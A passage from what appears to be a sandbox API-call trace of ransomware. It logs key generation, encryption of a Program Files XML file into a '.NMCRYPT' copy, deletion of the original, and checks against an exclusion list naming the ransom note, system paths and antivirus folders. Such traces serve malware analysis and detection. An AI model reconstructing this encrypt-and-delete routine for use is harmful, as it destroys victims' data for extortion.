CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.204] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.205] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.205] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.205] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.205] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.205] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.205] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.205] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.205] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0146.205] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0146.205] CryptCreateHash (in: hProv=0x8e34c8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0146.205] CryptHashData (hHash=0x9ad3b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.205] CryptDeriveKey (in: hProv=0x8e34c8, Algid=0x6610, hBaseData=0x9ad3b8, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad7f8) returned 1 [0146.205] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0146.205] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0146.205] wcslen (_String="\\\\?\\") returned 0x4 [0146.206] CryptDuplicateKey (in: hKey=0x9ad7f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad478) returned 1 [0146.206] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0146.206] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0146.206] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2556) returned 1 [0146.206] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0146.206] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.207] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.207] GetLastError () returned 0x0 [0146.207] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.208] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.208] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.208] GetLastError () returned 0x0 [0146.209] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.209] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.209] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.209] GetLastError () returned 0x0 [0146.209] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.209] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.209] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.209] GetLastError () returned 0x0 [0146.209] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.209] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.209] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.209] GetLastError () returned 0x0 [0146.209] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.209] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.209] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.209] GetLastError () returned 0x0 [0146.209] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.209] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.209] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.209] GetLastError () returned 0x0 [0146.209] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.209] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.209] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.209] GetLastError () returned 0x0 [0146.209] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.209] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.210] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.210] GetLastError () returned 0x0 [0146.210] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.210] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0xfc, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0xfc, lpOverlapped=0x0) returned 1 [0146.210] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xfc, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.210] GetLastError () returned 0x0 [0146.210] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.210] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0146.210] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0146.210] CloseHandle (hObject=0x1624) returned 1 [0146.210] CloseHandle (hObject=0x588) returned 1 [0146.211] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml")) returned 0x20 [0146.211] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml", dwFileAttributes=0x20) returned 0 [0146.211] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml") returned 1 [0146.211] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml")) returned 0 [0146.211] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml" [0146.211] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0146.211] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXAE05.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxae05.tmp")) returned 0xae05 [0146.212] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXAE05.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxae05.tmp"), dwFlags=0x1) returned 0 [0146.212] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXAE05.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxae05.tmp")) returned 1 [0146.212] CryptDestroyKey (hKey=0x9ad478) returned 1 [0146.212] wcslen (_String="OK") returned 0x2 [0146.212] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0146.212] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0146.212] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0146.212] CryptDestroyHash (hHash=0x9ad3b8) returned 1 [0146.212] CryptReleaseContext (hProv=0x8e34c8, dwFlags=0x0) returned 1 [0146.213] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*NMCRYPT") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*Recovers your files.html") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*.exe") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*.dll") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*.lnk") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*.bat") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*.ini") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*.msi") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*.scf") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*pagefile.sys*") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*NTUSER.DAT*") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*AppData*") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*\\winrar\\*") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*\\java\\*") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*\\windows\\*") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*\\ESET\\*") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*\\AVG\\*") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*\\AVIRA\\*") returned 0 [0146.213] PathMatchSpecW (pszFile="ipsdan.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0146.213] 